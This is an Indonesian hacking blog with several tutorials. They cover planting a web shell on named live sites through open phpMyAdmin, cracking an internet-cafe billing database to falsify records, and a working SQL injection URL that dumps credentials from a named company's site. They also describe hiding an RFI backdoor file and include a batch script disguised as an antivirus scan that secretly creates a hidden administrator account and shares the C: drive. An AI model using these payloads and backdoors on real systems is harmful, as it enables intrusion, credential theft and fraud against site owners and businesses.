coco_nk4l site

Gw yakin kalo banyak dari loe semua dah pada tau apa itu namanya shell??? Yups bagi gw shell adalah Backdoor buat system pada suatu site, bayangin loe gak perlu tau password dr cpanel, loe bisa cari tw passwordnya, lo bisa utak utik file managernya nambah file ato hapus file atau deface tugh site sekalian, pada umumnya shell sering kita jumpai dengan system operasi Linux, walaupun gak menutup kemungkinan shell yang kita dapetin adalah basis Windows, nah pertanyaan gimana cara bedainnya antara tugh shell pake OS windows ato pake OS linux???

Yang membedakan yaitu pada bagian uname-a akan terdapat jenis windows yg di pake kalo kalian menggunakan shell dengan jenis (c99), disini gw gak bakalan jelasin secara detail apaan itu shell, fungsinya apaan aja, tp dsini gw Cuma ingin share pengetahuan gw tentang gimana cara dapet Shell windows menggunakan kelemahan ato vulnerability dari phpmyadmin dan xampp, langsung aja kita coba…

Yang harus loe siapkan :

• PC dengan Koneksi Internet tentunya
• Kesabaran
• Script Shell yang udah di encode menjadi base64 kalian bisa ambil di http://geocities.com/kyo2_2004/alat/shell_64.txt’
• Pengetahuan ttg google dork untuk variasi target
• Kopi plus rokok n camilan kalo perlu

Yang pertama kita lakukan setelah semua kebutuhan terpenuhi yaitu, kita musti cari target dahulu, pertama coba lakukan pencarian target dengan bantuan paman Google, Dork yang kita gunakan adalah Inurl:/xampp/lang.php? & bisa juga kita variasi untuk ke suatu Negara tertentu saja.

Setelah melakukan pencarian coba aja kita cari target, kali ini gwa kasih contoh targetnya adalah..

http://racewarz.org/xampp/lang.php?it

Kita lihat diatas adalah tampilan dari phpmyadmin dari site http://racewarz.org/

Nah kalo udah dsana ada Tulisan phpmyadmin, coba loe buka apakah bisa kita akses secara langsung atokah harus make login, ternyata gak perlu login kita dah bisa masuk kedalam phpmyadmin yang bentuknya kurang lebih seperti gambar di bawah ini

Setelah kita masuk phpmyadmin kita buka Querywindow yang di wakili ama icon kotak bertuliskan SQL. Dan akan muncul popup seperti berikut

Dalam popup itu kita bisa inject perintah2 SQL, nah disini silahkan kalian masukan code seperti ini :

SELECT “script shell hasil encode” INTO OUTFILE ‘lokasi DOCUMENT_ROOT(htdocs)‘

Ket:

Lokasi htdocs : lokasi dimana isi dari semua site tersimpan cara untuk mengetahuinya yaitu dengan cara membuka halaman phpinfo

http://www.racewarz.org/xampp/phpinfo.php ato bisa juga klik tulisan phpinfo() pada tampilan phpmyadmin, yang hasilnya kurang lebih seperti ini

Nah kalo udah hasil script yang kita masukan kedalam Query window adalah sebagai berikut:

SELECT INTO “isi script shell” INTO OUTFILE ‘C:/xampp/htdocs/hc.php’

Penjelasan:

Isi script shell gak gw tulis soalnya terlalu banyak

Nah dsana ada c:/xampp/htdocs dimana itu adalah lokasi DOCUMENT_ROOT ato lokasi file2 web di simpan,

Dan hc.php adalah nama file dari shell yang gw tanam.

Kalo udah tekan tombol GO

Dan kita tunggu sesaat sampe proses dari phpmyadmin selesai kalo udah semua prosesnya, kita bakalan lead hasilnya

Di http://www.racewarz.org/hc.php dan hasilnya adalah seperti gambar di bawah

Shell windows dah di tanggan, untuk command2 yang di pake berbeda dengan shell Linux, command yang akan kita pakai yaitu command yang sama seperti kita gunain CMD ato Ms Dos.

Kalian pasti dah gak asing lagi dengan namanya Billing explorer, Billing yg kebanyakan di gunakan oleh para pemilik warnet, Billing Ini mampu menyimpan semua hasil transaksi dan semua konfigurasinya di sebuah file yang berekstensikan *.008 ( 008 file ) nah mungkin gak gw doank yg punya fikiran file ini sebenernya file apaan c??? ternyata setelah di obok2 file tersebut adalah File database yg diubah ekstensi aslinya mnjadi *.008. disini gw bakalan coba kasih tau gimana cara bacanya tapi jangan punya harapan untuk bisa membaca password Admin dolo karena gw lom sempat nemuin cara tersebut, Trik ini mungkin sangat berharga buat para Operator warnet yg menggunakan Billing ini dan ingin melakukan sedikit kecurangan tetapi tidak di beri tau password admin pada billing (Seperti yg di alami Kakak gw). Oke gw kira cukup basa-basi kita .

Yang musti loe lakuin adalah buka lokasi dimana software billing di install contoh : “D:\Billing\Billing explorer\” Lihat disana bakal ada file ber ekstensi *.008

Disana loe bakal nemuin file bernama bill01.008 (lihat tanda panah) sebelumnya copy dulu file tersebut untuk menghindari hal yang gak di inginkan lalu ubah ekstensi dari bill01.008 menjadi bill01.mdb setelah di ubah ekstensinya coba loe buka file tersebut apakah bisa di buka??

Ternyata File bill01.mdb di lock untuk bisa membukanya, pake Advance Office Password Recovery ( Silahkan kalian googling ) kalo udah silahkan di crack password dari File bil01.mdb dan yang akan kita dapetin sepert gambar dibawah ini

Pada gambar diatas terlihat password file ternyata berantakan masih berupa code2 yg aneh, tapi gak usah takut yg kita butuhin hanya password itu untuk membuka dan mengedit file tersebut jadi copy aja passwordnya dgan click icon 2 kertas di samping password dan masukan password ketika di minta untuk memasukan password pada saat kita buka file bill01.mdb, setalh itu coba open database…dan masuk pada table2 yang sekiranya ingin kalian ubah,

Setelah selese di edit save kembali dan kembalikan format ke semula menjadi bill01.008 dan gantikan file asli dengan file hasil editan kita .

Catatan :

Pada saat menggantikan file bill01.008 yg asli dengan file hasil editan kita, pastikan billing server dalam keadaan non aktif.

Gila Ne Bugs SQLi yg masih Vuln baget pada web Indo BMG musik pada Web Ini http://www.sonymusic.co.id coba aja lead

[+] Bug : SQL injection
[+] Author : nk4l
[+] Greetz : inc0mp13te, IndoUnderground, Jack-, selalu_ngantuk, x-code, Metropolix
[=]vuln file : album81.php
[=]Target : http://www.sonymusic.co.id/album81.php?id=808+AND+1=2+UNION+SELECT+0,1,2,group_concat(name,0×3a,password),4,5,6,7,8,9,10,11+from+user–

yang master ngga usah baca

nah gini nich…

okeh langsung ajah

kalo pas dapet target RFI naluri temen-temen pasti yang pertama langsung pasang backdoor dan patch bugnya.

kalo ngga langsung buru-buru ke /tmp trus utak atik di situ :p

trik untuk menghidari mafia tukang patch bug dan tukang delete backdoor orang nah jadi kepikiran kalo bugnya di patch kan jadi ngga bisa masuk lagi

kenapa ngga bikin bug aja sendiri :p

dengan asumsi para penghapus BD tadi selalu memperhatikan ukuran file dan nama file yang mencurigakan langsung aja pas giliran kita dapet kesempatan upload atau cread file langsung bikin nama file yang ngga mencurigakan misal sys.php atau terserah kalian lah yang kira-kira menurut kalian nagga mencurigakan

kita contohkan dengan sys.php

nah kita isi filenya dengan bug RFI

nah kan kita sekarang punya file backdoor dengan ukuran yang tidak mencolok alias sangat kecil
cara pakainya seperti inject RFI seperti biasa

sys.php?sys= << inject pake shell kamu

misal:

http://intipmemek.co.cc/sys.php?sys=[shell]

dan kita ahirnya punya backdoor yang ngga mencurigakan dan semoga awet sampai anak cucu kita
Thanks to:

- Kecemplung kalen
- http://serverisdown.org and MainHack Enterprise
- Jasakom.com

Binun mau sembunyiin file rahasia di mana???? mau pake aplikasi Folder Lock tapi trial… disini gw cuma mw kasih saran and sedikit trick, kalo loe mau sembunyiin file rahasia entah itu Bokep ato apaan lah…

caranya buka note pad CoPas code berikut

cls
@ECHO OFF
title Folder locker ~ coco_nk4l
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p “pass=>”
if NOT %pass%==PASSWORDKAMU goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md locker
echo locker created successfully
goto End
:End

Simpan Code diatas dengan Ekstensi bat lalu ganti PASSWORDKAMU dengan password yang kan kamu pake, trus eksekusi kalo udah akan ada Folder bernama LOCKER simpan File2 rahasia loe dsana

Binun ama titlenya???? Trick ini gw dapet dari temen, gila pas gw test ternya begitu…..

coba masukkan code ini kedalam firefox addres bar firefox

chrome://browser/content/browser.xul

apa yang kamu lihat

Buat File Batch yang isinya sebagai berikut…

@Echo off

rem * Tambah User nk4l dengan password jebol

net user nk4l jebol /add

rem * Tambah User nk4l Ke Group Administrators

net localgroup Administrators nk4l /add

rem * Delete User nk4l Di Group Users

net localgroup Users nk4l /delete

rem * Umpetin User nk4l di logon Windows dan Control Panel
reg add “HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList” /v nk4l /d 0 /t reg_dword /f

rem * Tambahin Classical Sharing biar isa di remote AWRC
reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa” /v forceguest /d 0 reg_dword /f

rem * Share Drive C: si admin dengan nama nk4l
net share c: /unlimited

rem * Kasih Banner Tipuan biar gak curiga

echo.
echo ###############################################################
echo # #
echo # Scanning Virus Finished #
echo # Virus Found : 0 #
echo # Scanned 324 Files #
echo # Thanks for using nk4l Anti virus #
echo # #
echo ###############################################################
echo.
echo Press Enter to Continue !!!
pause>C:Null